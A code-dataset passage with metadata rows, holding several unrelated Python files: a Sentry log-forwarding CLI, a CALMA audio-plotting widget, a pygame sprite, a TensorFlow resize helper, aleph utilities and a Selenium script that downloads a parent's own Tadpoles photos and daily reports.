print('Using the Nginx error log path %s' % args.nginxerrorpath)
os.environ['NGINX_ERROR_PATH'] = args.nginxerrorpath
if args.loglevel:
print('Using the sentry log level %s' % args.loglevel)
os.environ['SENTRY_LOG_LEVEL'] = args.loglevel
from ..conf import settings # noqa: F401; pylint: disable=unused-import
if args.daemonize:
print('Running process in background')
from ..daemonize import create_daemon
create_daemon()
def parse_sentry_configuration(filename):
"""Parse Sentry DSN out of an application or Sentry configuration file"""
filetype = os.path.splitext(filename)[-1][1:].lower()
if filetype == 'ini': # Pyramid, Pylons # pylint: disable=no-else-raise
config = ConfigParser()
config.read(filename)
ini_key = 'dsn'
ini_sections = ['sentry', 'filter:raven']
for section in ini_sections:
if section in config:
print('- Using value from [{section}]:[{key}]'
.format(section=section, key=ini_key))
try:
return config[section][ini_key]
except KeyError:
print('- Warning: Key "{key}" not found in section '
'[{section}]'.format(section=section, key=ini_key))
raise SystemExit('No DSN found in {file}. Tried sections [{sec_list}]'
.format(
file=filename,
sec_list='], ['.join(ini_sections),
))
elif filetype == 'py': # Django, Flask, Bottle, ...
raise SystemExit('Parsing configuration from pure Python (Django,'
'Flask, Bottle, etc.) not implemented yet.')
raise SystemExit('Configuration file type not supported for parsing: '
'%s' % filetype)
def launch_log_parsers():
"""Run all log file parsers that send entries to Sentry"""
from ..parsers.nginx import Nginx
for parser in [Nginx]:
parser().follow_tail()
def main():
"""Main entry point of console script"""
args = get_command_line_args()
process_arguments(args)
print('Start sending %s logs to Sentry' % args.follow)
launch_log_parsers()
if __name__ == '__main__':
main()
| 37.310345 | 81 | 0.606978 | 495 | 4,328 | 5.191919 | 0.333333 | 0.028016 | 0.039689 | 0.021012 | 0.022568 | 0.022568 | 0 | 0 | 0 | 0 | 0 | 0.002236 | 0.276802 | 4,328 | 115 | 82 | 37.634783 | 0.81885 | 0.124307 | 0 | 0.024691 | 0 | 0 | 0.2506 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.061728 | false | 0 | 0.111111 | 0 | 0.197531 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41309aa7b95e9754a43f4174cd8bb81a323ae14b | 9,102 | py | Python | etreebrowser/graph.py | CameronJRAllan/eTree-Browser | 72601450eb8538f79511715c5793a8594bdcfc80 | [
"MIT"
] | 1 | 2019-07-19T20:03:00.000Z | 2019-07-19T20:03:00.000Z | etreebrowser/graph.py | CameronJRAllan/eTree-Browser | 72601450eb8538f79511715c5793a8594bdcfc80 | [
"MIT"
] | null | null | null | etreebrowser/graph.py | CameronJRAllan/eTree-Browser | 72601450eb8538f79511715c5793a8594bdcfc80 | [
"MIT"
] | null | null | null | from PyQt5 import QtWidgets, QtCore
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
from matplotlib import rcParams
rcParams['font.family'] = 'sans-serif'
rcParams['font.sans-serif'] = ['Cantarell']
import matplotlib.pyplot as plt
import matplotlib.patches as mpatch
import numpy as np
import operator
import matplotlib.patheffects as path_effects
class CalmaPlot(FigureCanvas):
"""
This class provides functionality for providing graphical representations of CALMA data.
"""
def __init__(self, width, height, dpi, hasCalma, parent=None):
"""
Constructs an instance of the CALMA graphing class.
An instance of CalmaPlot inherits FigureClass, a MatPlotLib class for displaying plots in the
text of a PyQt5 application. It generates a figure (upon which we may draw), as well as a canvas to
place the figure upon.
Parameters
----------
weight : int
The width of the figure to be created.
height : int
The height of the figure to be created.
dpi : int
The dots-per-inch for the figure typically 100.
"""
# Create Figure instance (which stores our plots)
self.fig = Figure(figsize=(2, 2), dpi=dpi, edgecolor='blue')
# Add an initial plot to our figure
self.canvasGraph = self.fig.add_subplot(111)
# Fetch colour map
self.colourMap = self.get_colour_map()
# Initialize figure canvas, which initializes an instance of QtWidget
FigureCanvas.__init__(self, self.fig)
self.setParent(parent)
# Store reference to axes
self.ax = self.fig.gca()
# Hide tick labels to create default style
self.ax.set_yticklabels([])
self.ax.set_xticklabels([])
# Add placeholder text
if hasCalma:
self.placeHolderText = self.fig.text(0.5, 0.65,'Click on a performance track for CALMA data',horizontalalignment='center',
verticalalignment='center', fontsize=16)
else:
self.placeHolderText = self.fig.text(0.5, 0.65,'No CALMA data available for this query',horizontalalignment='center',
verticalalignment='center',
fontsize=16)
# Make background transparent
self.fig.patch.set_alpha(1.0)
# Resize with window
FigureCanvas.setSizePolicy(self, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
FigureCanvas.updateGeometry(self)
self.setMinimumSize(self.size())
def get_segment_colour_map(self, features):
"""
Generates a colour map for segment features.
Parameters
----------
features : float[]
Features information.
Returns
----------
newColourMap : str[]
Colour map for each segment type.
"""
hashList = {'1' : 'Grey',
'2':'Red',
'3':'Green',
'4':'greenyellow',
'5':'Pink',
'6':'Orange',
'7':'goldenrod',
'8':'indianred',
'9':'peachpuff',
'10':'deepskyblue',
'11':'firebrick',
'12':'orchid',
'13': 'moccasin',
'14':'slateblue',
'15':'turquoise',
'16':'tomato',
'17':'darkmagenta',
'18':'olivedrab'}
return hashList
def plot_calma_data(self, loudnessValues, features, duration, type, **kwargs):
"""
Takes CALMA data for a single track as input, and creates a plot.
Parameters
----------
loudnessValues : float[]
An array of loudness / amplitude values.
features : float[]
Features information.
duration : float
The duration of the track.
"""
# Replace colour map if needed
if type == 'segment' : self.colourMap = self.get_segment_colour_map(features)
if type == 'key' : self.colourMap = self.get_colour_map()
# Hide placeholder text if visible
try:
self.placeHolderText.remove()
text = self.fig.text(0.5, 0.65, kwargs['title'], horizontalalignment='center',
verticalalignment='center', fontsize=16)
text.set_path_effects([path_effects.Stroke(linewidth=2, foreground='white'),
path_effects.Normal()])
except (KeyError, ValueError) as v:
self.placeHolderText.set_text('')
# Perform pre-processing
nploudnessValues, duration, xSpaced, average = self.pre_processing(loudnessValues, duration)
# Plot waveform
self.canvasGraph.axes.cla()
self.canvasGraph.plot(xSpaced, nploudnessValues)
for index, key in enumerate(features):
# Calculate graph positions
lx, ly, rec = self.calculate_graph_element_position(features, key, index, duration, average)
# Add annotation to plot
self.canvasGraph.annotate(key[1], (lx, ly), weight='bold', color='Black',
fontsize=7, ha='center', va='center', rotation=270)
self.ax.add_artist(rec)
# Set axes labels
self.ax.set_yticklabels([])
self.ax.set_xlabel("Time (seconds)")
# Add colour legend for keys
keysAsSet = list(set([x[1] for x in features]))
patches = []
for k in keysAsSet:
# Plot rectangle for key changes
try:
fc = self.colourMap[k]
except KeyError as keyerr:
fc = 'grey'
patch = mpatch.Patch(color=fc, label=k)
patches.append(patch)
self.canvasGraph.legend(handles=patches, bbox_to_anchor=(1.00, 1), loc=2, borderaxespad=0, fontsize=7, ncol=2)
self.fig.subplots_adjust(left=0.00, right=0.85, top=0.95)
try:
kwargs['release']
except KeyError as v:
# Causes crash with multiple plots
self.finishDraw()
self.fig.patch.set_alpha(1.0)
return
def calculate_graph_element_position(self, keyInfo, key, index, duration, average):
"""
Calculates the position of the rectangular patch, relative to the event duration.
Parameters
----------
keyInfo : String[]
Track meta-data such as label.
key : float[]
Features information.
index : int
Index in the keys we are processing.
duration : float
The duration of the track.
average : float
Average signal amplitude value of the track.
Return
----------
ly : int
The y position of the patch.
lx : int
The x position of the patch.
rec : Rectangular
A rectangular patch object.
"""
# Rectangle takes (lowerleftpoint=(X, Y), width, height)
xy = (float(key[0]), self.ax.get_ylim()[1])
# If not the latest element in the key-change data
if index < len(keyInfo) - 1:
# Swap width and height as we are rotating 270 degrees
height = keyInfo[index + 1][0] - keyInfo[index][0]
else:
height = duration - keyInfo[index][0]
width = self.ax.get_ylim()[1]
angle = 270
# Plot rectangle for key changes
try:
fc = self.colourMap[key[1]]
except KeyError as k:
fc = 'grey'
rec = mpatch.Rectangle(xy, width, height, angle=angle, alpha=0.5, fc=fc)
# Calculate label positions
rx, ry = rec.get_xy()
lx = rx + rec.get_height() / 2.0
ly = average
return lx, ly, rec
def get_colour_map(self):
"""
Returns a colour map for key changes to ensure consistent patterns across CALMA plots.
"""
try:
return {'C# minor' : 'Grey', 'A major' : 'Red', 'D minor' : 'Green',
'Eb Purple': 'greenyellow', 'D major' : 'Pink', 'G major' : 'Orange',
'G minor': 'goldenrod', 'A minor' : 'indianred', 'C minor' : 'peachpuff',
'B minor' : 'deepskyblue', 'Ab Major' : 'firebrick', 'Eb / D# minor' : 'orchid',
'Ab major' : 'moccasin', 'G# minor' : 'slateblue', 'Eb major' : 'turquoise',
'C major' : 'tomato', 'B major' : 'darkmagenta', 'F major' : 'olivedrab',
'F minor' : 'olive', 'Bb major' : 'lightsteelblue', 'Db major' : 'plum',
'Bb minor' : 'mediumspringgreen', 'E minor' : 'lightsalmon',
'F# / Gb major' : 'gold', 'F# minor' : 'burlywood'}
# If colour not found to match, return grey as a last resort
except KeyError as e:
print('Unmatched colour: {0}'.format(e))
return 'Grey'
def pre_processing(self, loudnessValues, duration):
# Clip
loudnessValues = loudnessValues[100:-50]
nploudnessValues = np.array(loudnessValues)
# Frame-rate is the number of values provided, divided by the duration
frame_rate = len(nploudnessValues) / duration
# Calculate average for placing labels on Y-AXIS
average = sum(loudnessValues) / len(loudnessValues)
# Generate linear spacing for seconds in X-AXIS
xSpaced = np.linspace(0, len(loudnessValues) / frame_rate, num=len(loudnessValues))
return nploudnessValues, duration, xSpaced, average
def finishDraw(self):
self.fig.canvas.draw_idle() | 33.340659 | 128 | 0.614041 | 1,082 | 9,102 | 5.114603 | 0.33549 | 0.013914 | 0.006505 | 0.010842 | 0.117094 | 0.112035 | 0.062161 | 0.028551 | 0.028551 | 0 | 0 | 0.017057 | 0.272138 | 9,102 | 273 | 129 | 33.340659 | 0.818264 | 0.285761 | 0 | 0.115385 | 0 | 0 | 0.133247 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.053846 | false | 0 | 0.069231 | 0 | 0.176923 | 0.007692 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
413328f9159158b7e73d6e4e594f24dbc66f5d32 | 358 | py | Python | scripts/speed.py | Maxence-Santos/space-invader | 4ac359f61ab673c816005d0d85567c3227ec06a1 | [
"MIT"
] | null | null | null | scripts/speed.py | Maxence-Santos/space-invader | 4ac359f61ab673c816005d0d85567c3227ec06a1 | [
"MIT"
] | null | null | null | scripts/speed.py | Maxence-Santos/space-invader | 4ac359f61ab673c816005d0d85567c3227ec06a1 | [
"MIT"
] | null | null | null | import pygame
import os
class Speed:
def __init__(self,X):
self.X = X
self.Y = 700
self.image = pygame.image.load(os.path.join("img/speed_power_up.png"))
self.image = pygame.transform.scale(self.image, (55, 55))
def update_and_draw(self,screen):
screen.blit(self.image, (self.X, self.Y)) | 27.538462 | 79 | 0.594972 | 52 | 358 | 3.942308 | 0.519231 | 0.17561 | 0.087805 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02682 | 0.27095 | 358 | 13 | 80 | 27.538462 | 0.758621 | 0 | 0 | 0 | 0 | 0 | 0.063401 | 0.063401 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4133f8869dd2769312a3bb4f13caa9cc3c94d267 | 821 | py | Python | supermariopy/tfutils/image.py | theRealSuperMario/supermariopy | 9fff8275278ff26caff50da86109c25d276bb30b | [
"MIT"
] | 36 | 2019-07-14T16:10:37.000Z | 2022-03-29T10:11:03.000Z | supermariopy/tfutils/image.py | theRealSuperMario/supermariopy | 9fff8275278ff26caff50da86109c25d276bb30b | [
"MIT"
] | 3 | 2019-10-09T15:11:13.000Z | 2021-07-31T02:17:43.000Z | supermariopy/tfutils/image.py | theRealSuperMario/supermariopy | 9fff8275278ff26caff50da86109c25d276bb30b | [
"MIT"
] | 14 | 2019-08-29T14:11:54.000Z | 2022-03-06T13:41:56.000Z | import tensorflow as tf
def resize_bilinear(x, shape):
"""
Raises a warning if tensorflow version is too in order to buggy behavior
References
----------
[1]: https://github.com/tensorflow/tensorflow/issues/6720
[2]: https://github.com/tensorflow/tensorflow/issues/33691
"""
tf_version = tf.__version__
major_version, minor_version, _ = tf_version.split(".")
version = int(major_version) * 100 + int(minor_version)
if version < 114: # 1.14
raise NotImplementedError(
"Resize bilinear is buggy for tensorflow version below 1.14"
)
elif version >= 114 and version < 115: # 114
return tf.image.resize_bilinear(x, shape, align_corners=True)
elif version >= 115:
return tf.image.resize_bilinear(x, shape, align_corners=True)
| 34.208333 | 76 | 0.665043 | 105 | 821 | 5.047619 | 0.466667 | 0.10566 | 0.084906 | 0.113208 | 0.335849 | 0.335849 | 0.184906 | 0.184906 | 0.184906 | 0.184906 | 0 | 0.054945 | 0.224117 | 821 | 23 | 77 | 35.695652 | 0.77708 | 0.270402 | 0 | 0.153846 | 0 | 0 | 0.10424 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.076923 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41347176b216823b2850da2216f2fdd2a2569240 | 1,746 | py | Python | aleph/util.py | mcrouse911/findpeopleviadocument | fecb99a5c167dd281af324f8c862fda70021f081 | [
"MIT"
] | null | null | null | aleph/util.py | mcrouse911/findpeopleviadocument | fecb99a5c167dd281af324f8c862fda70021f081 | [
"MIT"
] | null | null | null | aleph/util.py | mcrouse911/findpeopleviadocument | fecb99a5c167dd281af324f8c862fda70021f081 | [
"MIT"
] | null | null | null | # coding: utf-8
import time
import random
import logging
from celery import Task
from banal import ensure_list
from normality import stringify
from pkg_resources import iter_entry_points
log = logging.getLogger(__name__)
EXTENSIONS = {}
def get_extensions(section):
if section not in EXTENSIONS:
EXTENSIONS[section] = {}
if not EXTENSIONS[section]:
for ep in iter_entry_points(section):
EXTENSIONS[section][ep.name] = ep.load()
return list(EXTENSIONS[section].values())
def dict_list(data, *keys):
"""Get an entry as a list from a dict. Provide a fallback key."""
for key in keys:
if key in data:
return ensure_list(data[key])
return []
def backoff(failures=0):
failures = min(7, failures)
sleep = 2 ** (failures + random.random())
log.debug("Back-off: %.2fs", sleep)
time.sleep(sleep)
def html_link(text, link):
text = text or '[untitled]'
if link is None:
return "<span class='reference'>%s</span>" % text
return "<a class='reference' href='%s'>%s</a>" % (link, text)
def anonymize_email(name, email):
"""Generate a simple label with both the name and email of a user."""
name = stringify(name)
email = stringify(email)
if email is None:
return name
if '@' in email:
mailbox, domain = email.rsplit('@', 1)
if len(mailbox):
repl = '*' * (len(mailbox) - 1)
mailbox = mailbox[0] + repl
email = '%s@%s' % (mailbox, domain)
if name is None:
return email
return '%s <%s>' % (name, email)
class SessionTask(Task):
def on_failure(self, exc, task_id, args, kwargs, einfo):
from aleph.core import db
db.session.remove()
| 26.059701 | 73 | 0.623711 | 237 | 1,746 | 4.523207 | 0.413502 | 0.079291 | 0.033582 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006121 | 0.251432 | 1,746 | 66 | 74 | 26.454545 | 0.814078 | 0.079038 | 0 | 0 | 0 | 0 | 0.068879 | 0.016907 | 0 | 0 | 0 | 0 | 0 | 1 | 0.122449 | false | 0 | 0.163265 | 0 | 0.469388 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4136db303bfc69cac0328040053f475ee2387084 | 20,461 | py | Python | tadpole-catcher.py | tandalesc/tadpole-catcher | 5c5a7fce892aeb6f4c237ff14843fb325032b3bf | [
"BSD-3-Clause"
] | null | null | null | tadpole-catcher.py | tandalesc/tadpole-catcher | 5c5a7fce892aeb6f4c237ff14843fb325032b3bf | [
"BSD-3-Clause"
] | null | null | null | tadpole-catcher.py | tandalesc/tadpole-catcher | 5c5a7fce892aeb6f4c237ff14843fb325032b3bf | [
"BSD-3-Clause"
] | null | null | null | """This module downloads all photos/videos from tadpole to a local folder."""
import os
from os.path import abspath, dirname, join, isfile, isdir
import re
import sys
import json
import time
import pickle
import logging
import logging.config
from random import randrange
from getpass import getpass
from configparser import ConfigParser
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import NoSuchElementException
import requests
class DownloadError(Exception):
"""An exception indicating some errors during downloading"""
pass
class Image(object):
url_re = re.compile('\\("([^"]+)')
url_search = lambda div: Image.url_re.search(div.get_attribute("style"))
def __init__(self, div, date=None):
self.div = div
# Extract URL from div
_url = Image.url_search(div).group(1)
_url = _url.replace('thumbnail=true', '')
_url = _url.replace('&thumbnail=true', '')
self.url = 'https://www.tadpoles.com' + _url
# Extract id from div
# Shorten _id to avoid OS file length limit
# TODO more robust id algorithm
_id = div.get_attribute('id').split('-')[1]
_id = _id[int(len(_id)/2):]
self.id = _id
# Save date (defaults to None)
self.date = date
# Get key (for downloading)
_, self.key = self.url.split("key=")
@property
def date_text(self):
return "{:02d}".format(self.date if self.date is not None else 1)
class Report(object):
def __init__(self, div):
self.div = div
self.display_text = div.get_attribute('outerText')
date = int(self.display_text.split('\n')[1].split('/')[1])
self.date_text = "{:02d}".format(date)
class Client:
"""The main client class responsible for downloading pictures/videos"""
COOKIE_FILE = "cookies.pkl"
ROOT_URL = "http://www.tadpoles.com/parents"
HOME_URL = "https://www.tadpoles.com/parents"
CONFIG_FILE_NAME = "conf.json"
MIN_SLEEP = 1
MAX_SLEEP = 3
MONTHS = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', 'sep', 'oct', 'nov', 'dec']
def __init__(self, config, download_reports=True):
self.init_logging()
self.browser = None
self.cookies = None
self.req_cookies = None
self.__current_month__ = None
self.__current_year__ = None
self.current_child = None
self.download_reports = download_reports
self.config = config
# e.g. {'jan':'01', 'feb':'02', ...}
self.month_lookup = {month: "{:02d}".format(Client.MONTHS.index(month)+1) for month in Client.MONTHS}
def config_login_info(self):
return self.config['AUTHENTICATION']
def config_requests_info(self):
return self.config['DOWNLOADS']
def init_logging(self):
"""Set up logging configuration"""
# Create logging dir
directory = dirname('logs/')
if not isdir(directory):
os.makedirs(directory)
logging_config = dict(
version=1,
formatters={
'f': {
'format': '%(asctime)s %(name)-12s %(levelname)-8s %(message)s'}
},
handlers={
'h': {
'class': 'logging.StreamHandler',
'formatter': 'f',
'level': logging.DEBUG
},
'f': {
'class': 'logging.FileHandler',
'formatter': 'f',
'filename': 'logs/tadpole.log',
'level': logging.INFO}
},
root={
'handlers': ['h', 'f'],
'level': logging.DEBUG,
},
)
logging.config.dictConfig(logging_config)
self.logger = logging.getLogger('tadpole-catcher')
def __enter__(self):
self.logger.info("Starting browser")
self.browser = webdriver.Chrome()
self.browser.implicitly_wait(10)
self.logger.info("Got a browser")
return self
def __exit__(self, *args):
self.logger.info("Shutting down browser")
self.browser.quit()
def sleep(self, minsleep=None, maxsleep=None):
"""Sleep a random amount of time bound by the min and max value"""
_min = minsleep or self.MIN_SLEEP
_max = maxsleep or self.MAX_SLEEP
duration = randrange(_min * 100, _max * 100) / 100.0
self.logger.info('Sleeping %r', duration)
time.sleep(duration)
def navigate_url(self, url):
"""Force the browser to go a url"""
self.logger.info("Navigating to %r", url)
self.browser.get(url)
def load_cookies(self):
"""Load cookies from a previously saved ones"""
self.logger.info("Loading cookies.")
with open(self.COOKIE_FILE, "rb") as file:
self.cookies = pickle.load(file)
def dump_cookies(self):
"""Save cookies of the existing session to a file"""
self.logger.info("Dumping cookies.")
self.cookies = self.browser.get_cookies()
with open(self.COOKIE_FILE, "wb") as file:
pickle.dump(self.browser.get_cookies(), file)
def add_cookies_to_browser(self):
"""Load the saved cookies into the browser"""
self.logger.info("Adding the cookies to the browser.")
for cookie in self.cookies:
if self.browser.current_url.strip('/').endswith(cookie['domain']):
self.browser.add_cookie(cookie)
def requestify_cookies(self):
"""Transform the cookies to what the request lib requires."""
self.logger.info("Transforming the cookies for requests lib.")
self.req_cookies = {}
for s_cookie in self.cookies:
self.req_cookies[s_cookie["name"]] = s_cookie["value"]
def switch_windows(self):
'''Switch to the other window.'''
self.logger.info("Switching windows.")
all_windows = set(self.browser.window_handles)
current_window = set([self.browser.current_window_handle])
other_window = (all_windows - current_window).pop()
self.browser.switch_to.window(other_window)
def get_current_child(self):
return self.get_children_params()[self.current_child_ind]
def get_child_name(self):
display_name = self.get_current_child()['display_name']
return display_name.split(' ')[0]
def get_num_children(self):
return len(self.get_children_params())
def get_children_params(self):
#tadpoles does not provide the children attribute if there is only one child
if 'children' in self.app_params:
return self.app_params['children']
else:
#if there is only one child, provide default parameters
return [{'display_name': 'child'}]
def has_next_child(self):
return self.current_child_ind+1 < self.get_num_children()
# add 1 to current child index, and reset to 0 if too many
def next_child(self):
if self.has_next_child():
self.current_child_ind+=1
else:
self.current_child_ind=0
def do_login(self):
"""Perform login to tadpole (without Google SSO)"""
self.logger.info("Navigating to login page.")
self.browser.find_element_by_id("login-button").click()
self.browser.find_element_by_class_name("tp-block-half").click()
self.browser.find_element_by_class_name("other-login-button").click()
# Get email, password, and submit elements
form = self.browser.find_element_by_class_name("form-horizontal")
email_form = self.find_by_xpath('//input[@type="text"]', 'Email field', form)
pwd_form = self.find_by_xpath('//input[@type="password"]', 'Password field', form)
submit = self.find_by_xpath('//button[@type="submit"]', 'Submit button', form)
# Fill out info and submit
email = self.config_login_info()['username']
pwd = self.config_login_info()['password']
if email is '' or pwd is '':
self.logger.info("'settings.ini' does not contain authentication information. Falling back to user-inputted values.")
email = input("Enter email: ")
pwd = input("Enter password: ")
email_form.send_keys(email)
pwd_form.send_keys(pwd)
self.logger.info("Clicking 'submit' button.")
submit.click()
self.logger.info("Sleeping 2 seconds.")
self.sleep(minsleep=2)
def iter_monthyear(self):
'''Yields pairs of xpaths for each year/month tile on the
right hand side of the user's home page.
'''
month_xpath_tmpl = '//*[@id="app"]/div[3]/div[1]/ul/li[%d]/div/div/div/div/span[%d]'
month_index = 1
while True:
month_xpath = month_xpath_tmpl % (month_index, 1)
year_xpath = month_xpath_tmpl % (month_index, 2)
# Go home if not there already.
if self.browser.current_url != self.HOME_URL:
self.navigate_url(self.HOME_URL)
# Find the next month and year elements.
month = self.find_by_xpath(month_xpath, "any more months")
year = self.find_by_xpath(year_xpath, "any more years")
self.__current_month__ = month
self.__current_year__ = year
yield month
month_index += 1
def iter_urls(self):
'''Find all the image urls on the current page.
'''
if self.download_reports:
# Click the "All" button, so reports are included in our iterator
self.sleep(1, 3) # Ensure page is loaded
self.logger.info("Clicking 'All' button to load reports")
all_btn = self.find_by_xpath('//*[@id="app"]/div[3]/div[2]/div[1]/div[2]/ul/li[1]', "'All' button on the Timeline")
all_btn.click()
# For each month on the dashboard...
for month in self.iter_monthyear():
# Navigate to the next month.
month.click()
self.logger.info("Getting urls for month: %s", month.text)
self.sleep(minsleep=5, maxsleep=7)
# For each child...
for child in range(self.get_num_children()):
# Click on child if needed
if(self.get_num_children() > 1):
self.logger.info("Clicking on %s's page", self.get_child_name())
#0 ->2nd li, 1->3rd li, etc.
cur_child_xpath = '//*[@id="app"]/div[2]/div[3]/ul/li[%s]/li/div' % str(self.current_child_ind+2)
current_child = self.find_by_xpath(cur_child_xpath, "link to %s's page" % self.get_child_name())
# click events are only activated on mouseover
chain = ActionChains(self.browser).move_to_element_with_offset(current_child, 5, 5).click()
chain.perform()
# Bools to correctly identify reports and images
report = lambda div: (not Image.url_search(div)) and ('report' in div.get_attribute('outerText'))
image = lambda div: Image.url_search(div) and ('thumbnail' in Image.url_search(div).group(1))
elements = self.browser.find_elements_by_xpath('//div[@class="well left-panel pull-left"]/ul/li/div')
# Collect media files until we see a report
# Once we see a report, apply that date to all seen media files
# Yield processed media files, and then the report
# Deal with edge case where no report is found
media_buffer = []
for div in elements:
if image(div):
img = Image(div=div)
media_buffer.append(img)
elif report(div):
_report = Report(div=div)
# Apply date to all elements in buffer
date_text = _report.date_text
for img in media_buffer:
img.date = int(date_text)
# For each image/video, pop from buffer and yield
while len(media_buffer) > 0:
yield media_buffer.pop()
# Once images are processed, yield report div
yield _report
# Handle edge case where there are media files but no report
while len(media_buffer) > 0:
yield media_buffer.pop()
# Goto next child, if possible
self.next_child()
def save_report(self, report):
'''Save a report given the appropriate div.
'''
# Make file name
child_text = self.get_child_name().lower()
year_text = self.__current_year__.text
month_text = self.month_lookup[self.__current_month__.text]
date_text = report.date_text
filename_parts = ['download', child_text, year_text, month_text, 'tadpoles-{}-{}-{}-{}.{}']
filename_report = abspath(join(*filename_parts).format(child_text, year_text, month_text, date_text, 'html'))
# Only download if the file doesn't already exist.
if isfile(filename_report):
self.logger.info("Already downloaded report: %s", filename_report)
return
# Make sure the parent dir exists.
directory = dirname(filename_report)
if not isdir(directory):
os.makedirs(directory)
self.logger.info("Downloading report: %s", filename_report)
div = report.div
# Click on div
div.click()
self.sleep(1, 2) # Wait to load
# Extract body
body = self.browser.find_element_by_class_name('modal-overflow-wrapper')
text = body.get_attribute('innerHTML')
# Close pop-up
x = self.find_by_xpath('//*[@id="dr-modal-printable"]/div[1]/i', 'Close Popup Button')
x.click()
# Wait to load
self.sleep(1, 2)
with open(filename_report, 'w', encoding='UTF-8') as report_file:
self.logger.info("Saving: %s", filename_report)
report_file.write("<html>")
report_file.write(text)
report_file.write("</html>")
self.logger.info("Finished saving: %s", filename_report)
def save_image(self, img):
'''Save an image locally using requests.
'''
url = img.url
date_text = img.date_text
_id = img.id
key = img.key
year_text = self.__current_year__.text
month_text = self.month_lookup[self.__current_month__.text]
child_text = self.get_child_name().lower()
default_download_dir = self.config_requests_info()['default_download_dir']
# Make the local filename.
filename_parts = [default_download_dir, child_text, year_text, month_text, 'tadpoles-{}-{}-{}-{}-{}.{}']
filename_jpg = abspath(join(*filename_parts).format(child_text, year_text, month_text, date_text, _id, 'jpg'))
# we might even get a png file even though the mime type is jpeg.
filename_png = abspath(join(*filename_parts).format(child_text, year_text, month_text, date_text, _id, 'png'))
# We don't know if we have a video or image yet so create both name
filename_video = abspath(join(*filename_parts).format(child_text, year_text, month_text, date_text, _id, 'mp4'))
# Only download if the file doesn't already exist.
if isfile(filename_jpg):
self.logger.info("Already downloaded image: %s", filename_jpg)
return
if isfile(filename_video):
self.logger.info("Already downloaded video: %s", filename_video)
return
if isfile(filename_png):
self.logger.info("Already downloaded png file: %s", filename_png)
return
self.logger.info("Downloading from: %s", url)
# Make sure the parent dir exists.
directory = dirname(filename_jpg)
if not isdir(directory):
os.makedirs(directory)
# Sleep to avoid bombarding the server
self.sleep(1, 3)
# Download it with requests.
max_retries = int(self.config_requests_info()['max_retries'])
retries = 0
while retries < max_retries:
resp = requests.get(url, cookies=self.req_cookies, stream=True)
if resp.status_code == 200:
file = None
try:
content_type = resp.headers['content-type']
self.logger.info("Content Type: %s.", content_type)
if content_type == 'image/jpeg':
filename = filename_jpg
elif content_type == 'image/png':
filename = filename_png
elif content_type == 'video/mp4':
filename = filename_video
else:
self.logger.warning("Unsupported content type: %s", content_type)
return
for chunk in resp.iter_content(1024):
if file is None:
self.logger.info("Saving: %s", filename)
file = open(filename, 'wb')
file.write(chunk)
self.logger.info("Finished saving %s", filename)
finally:
if file is not None:
file.close()
break
else:
msg = 'Error downloading %r. Retrying. Response:'+str(resp)
retries += 1
self.logger.warning(msg, url)
self.sleep(1, 5)
def download_images(self):
'''Login to tadpoles.com and download all user's images.
'''
self.navigate_url(self.ROOT_URL)
self.do_login()
self.dump_cookies()
self.add_cookies_to_browser()
self.requestify_cookies()
# Get application parameters
self.app_params = self.browser.execute_script("return tadpoles.appParams")
self.logger.info("Loaded Tadpoles parameters")
# start off with child 0 (if more than one exists)
self.current_child_ind = 0
for response in self.iter_urls():
try:
if isinstance(response, Image):
self.save_image(response)
elif isinstance(response, Report):
self.save_report(response)
except DownloadError:
self.logger.exception("Error while saving resource")
except (KeyboardInterrupt):
self.logger.info("Download interrupted by user")
def find_by_xpath(self, selector, name='element', form=None):
'''Find element by xpath, but catch NoSuchElementException to log which XPath is faulty
'''
if form==None:
form = self.browser
try:
el = form.find_element_by_xpath(selector)
except NoSuchElementException:
self.logger.info("Could not find %s using XPath %s. Stopping.", name, selector)
sys.exit(0)
return el
# create a config file if one does not already exist/needs to be reset
def create_config_file(file_name):
cfg = ConfigParser()
cfg['AUTHENTICATION'] = {}
cfg['AUTHENTICATION']['username'] = ''
cfg['AUTHENTICATION']['password'] = ''
cfg['DOWNLOADS'] = {}
cfg['DOWNLOADS']['max_retries'] = '5'
